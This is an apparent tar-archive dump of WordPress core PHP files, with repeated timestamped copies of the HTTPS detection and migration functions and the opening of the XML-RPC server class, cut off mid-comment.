'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-migration-20260605175105.php 0000666 00000011205 15224151221 0011771 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260605104304-20260621230007.php 0000666 00000011205 15224151221 0013336 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-detection-20260605181535.php 0000666 00000013341 15224151221 0011765 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-detection-20260605164841-20260621081103-20260621181039.php 0000666 00000013341 15224151221 0014731 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-detection-20260606142425-20260621081111.php 0000666 00000013341 15224151221 0013335 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
class-wp-xmlrpc-server-20260621145045.php 0000666 00000644627 15224151221 0013222 0 ustar 00 <?php
/**
* XML-RPC protocol support for WordPress.
*
* @package WordPress
* @subpackage Publishing
*/
/**
* WordPress XMLRPC server implementation.
*
* Implements compatibility for Blogger API, MetaWeblog API, MovableType, and
* pingback. Additional WordPress API for managing comments, pages, posts,
* options, etc.
*
* As of WordPress 3.5.0, XML-RPC is enabled by default. It can be disabled
* via the {@see 'xmlrpc_enabled'} filter found in wp_xmlrpc_server::set_is_enabled().
*
* @since 1.5.0
*
* @see IXR_Server
*/
#[AllowDynamicProperties]
class wp_xmlrpc_server extends IXR_Server {
/**
* Methods.
*
* @var array
*/
public $methods;
/**
* Blog options.
*
* @var array
*/
public $blog_options;
/**
* IXR_Error instance.
*
* @var IXR_Error
*/
public $error;
/**
* Flags that the user authentication has failed in this instance of wp_xmlrpc_server.
*
* @var bool
*/
protected $auth_failed = false;
/**
* Flags that XML-RPC is enabled
*
* @var bool
*/
private $is_enabled;
/**
* Registers all of the XMLRPC methods that XMLRPC server understands.
*
* Sets up server and method property. Passes XMLRPC methods through the
* {@see 'xmlrpc_methods'} filter to allow plugins to extend or replace
* XML-RPC methods.
*
* @since 1.5.0
*/
public function __construct() {
$this->methods = array(
// WordPress API.
'wp.getUsersBlogs' => 'this:wp_getUsersBlogs',
'wp.newPost' => 'this:wp_newPost',
'wp.editPost' => 'this:wp_editPost',
'wp.deletePost' => 'this:wp_deletePost',
'wp.getPost' => 'this:wp_getPost',
'wp.getPosts' => 'this:wp_getPosts',
'wp.newTerm' => 'this:wp_newTerm',
'wp.editTerm' => 'this:wp_editTerm',
'wp.deleteTerm' => 'this:wp_deleteTerm',
'wp.getTerm' => 'this:wp_getTerm',
'wp.getTerms' => 'this:wp_getTerms',
'wp.getTaxonomy' => 'this:wp_getTaxonomy',
'wp.getTaxonomies' => 'this:wp_getTaxonomies',
'wp.getUser' => 'this:wp_getUser',
'wp.getUsers' => 'this:wp_getUsers',
'wp.getProfile' => 'this:wp_getProfile',
'wp.editProfile' => 'this:wp_editProfile',
'wp.getPage' => 'this:wp_getPage',
'wp.getPages' => 'this:wp_getPages',
'wp.newPage' => 'this:wp_newPage',
'wp.deletePage' => 'this:wp_deletePage',
'wp.editPage' => 'this:wp_editPage',
'wp.getPageList' => 'this:wp_getPageList',
'wp.getAuthors' => 'this:wp_getAuthors',
'wp.getCategories' => 'this:mw_getCategories', // Alias.
'wp.getTags' => 'this:wp_getTags',
'wp.newCategory' => 'this:wp_newCategory',
'wp.deleteCategory' => 'this:wp_deleteCategory',
'wp.suggestCategories' => 'this:wp_suggestCategories',
'wp.uploadFile' => 'this:mw_newMediaObject', // Alias.
'wp.deleteFile' => 'this:wp_deletePost', // Alias.
'wp.getCommentCount' => 'this:wp_getCommentCount',
'wp.getPostStatusList' => 'this:wp_getPostStatusList',
'wp.getPageStatusList' => 'this:wp_getPageStatusList',
'wp.getPageTemplates' => 'this:wp_getPageTemplates',
'wp.getOptions' => 'this:wp_getOptions',
'wp.setOptions' => 'this:wp_setOptions',
'wp.getComment' => 'this:wp_getComment',
'wp.getComments' => 'this:wp_getComments',
'wp.deleteComment' => 'this:wp_deleteComment',
'wp.editComment' => 'this:wp_editComment',
'wp.newComment' => 'this:wp_newComment',
'wp.getCommentStatusList' => 'this:wp_getCommentStatusList',
'wp.getMediaItem' => 'this:wp_getMediaItem',
'wp.getMediaLibrary' => 'this:wp_getMediaLibrary',
'wp.getPostFormats' => 'this:wp_getPostFormats',
'wp.getPostType' => 'this:wp_getPostType',
'wp.getPostTypes' => 'this:wp_getPostTypes',
'wp.getRevisions' => 'this:wp_getRevisions',
'wp.restoreRevision' => 'this:wp_restoreRevision',
// Blogger API.
'blogger.getUsersBlogs' => 'this:blogger_getUsersBlogs',
'blogger.getUserInfo' => 'this:blogger_getUserInfo',
'blogger.getPost' => 'this:blogger_getPost',
'blogger.getRecentPosts' => 'this:blogger_getRecentPosts',
'blogger.newPost' => 'this:blogger_newPost',
'blogger.editPost' => 'this:blogger_editPost',
'blogger.deletePost' => 'this:blogger_deletePost',
// MetaWeblog API (with MT extensions to structs).
'metaWeblog.newPost' => 'this:mw_newPost',
'metaWeblog.editPost' => 'this:mw_editPost',
'metaWeblog.getPost' => 'this:mw_getPost',
'metaWeblog.getRecentPosts' => 'this:mw_getRecentPosts',
'metaWeblog.getCategories' => 'this:mw_getCategories',
'metaWeblog.newMediaObject' => 'this:mw_newMediaObject',
/*
* MetaWeblog API aliases for Blogger API.
* See http://www.xmlrpc.com/stories/storyReader$2460
*/
'metaWeblog.deletePost' => 'this:blogger_deletePost',
'metaWeblog.getUsersBlogs' => 'this:blogger_getUsersBlogs',
// MovableType API.
'mt.getCategoryList' => 'this:mt_getCategoryList',
'mt.getRecentPostTitles' => 'this:mt_getRecentPostTitles',
'mt.getPostCategories' => 'this:mt_getPostCategories',
'mt.setPostCategories' => 'this:mt_setPostCategories',
'mt.supportedMethods' => 'this:mt_supportedMethods',
'mt.supportedTextFilters' => 'this:mt_supportedTextFilters',
'mt.getTrackbackPings' => 'this:mt_getTrackbackPings',
'mt.publishPost' => 'this:mt_publishPost',
// Pingback.
'pingback.ping' => 'this:pingback_ping',
'pingback.extensions.getPingbacks' => 'this:pingback_extensions_getPingbacks',
'demo.sayHello' => 'this:sayHello',
'demo.addTwoNumbers' => 'this:addTwoNumbers',
);
$this->initialise_blog_option_info();
/**
* Filters the methods exposed by the XML-RPC server.
*
* This filter can be used to add new methods, and remove built-in methods.
*
* @since 1.5.0
*
* @param string[] $methods An array of XML-RPC methods, keyed by their methodName.
*/
$this->methods = apply_filters( 'xmlrpc_methods', $this->methods );
$this->set_is_enabled();
}
/**
* Sets wp_xmlrpc_server::$is_enabled property.
*
* Determines whether the xmlrpc server is enabled on this WordPress install
* and set the is_enabled property accordingly.
*
* @since 5.7.3
*/
private function set_is_enabled() {
/*
* Respect old get_option() filters left for back-compat when the 'enable_xmlrpc'
* option was deprecated in 3.5.0. Use the {@see 'xmlrpc_enabled'} hook instead.
*/
$is_enabled = apply_filters( 'pre_option_enable_xmlrpc', false );
if ( false === $is_enabled ) {
$is_enabled = apply_filters( 'option_enable_xmlrpc', true );
}
/**
* Filters whether XML-RPC methods requiring authentication are enabled.
*
* Contrary to the way it's named, this filter does not control whether XML-RPC is *fully*
* enabled, rather, it only controls whether XML-RPC methods requiring authentication -
* such as for publishing purposes - are enabled.
*
* Further, the filter does not control whether pingbacks or other custom endpoints that don't
* require authentication are enabled. This behavior is expected, and due to how parity was matched
* with the `enable_xmlrpc` UI option the filter replaced when it was introduced in 3.5.
*
* To disable XML-RPC methods that require authentication, use:
*
* add_filter( 'xmlrpc_enabled', '__return_false' );
*
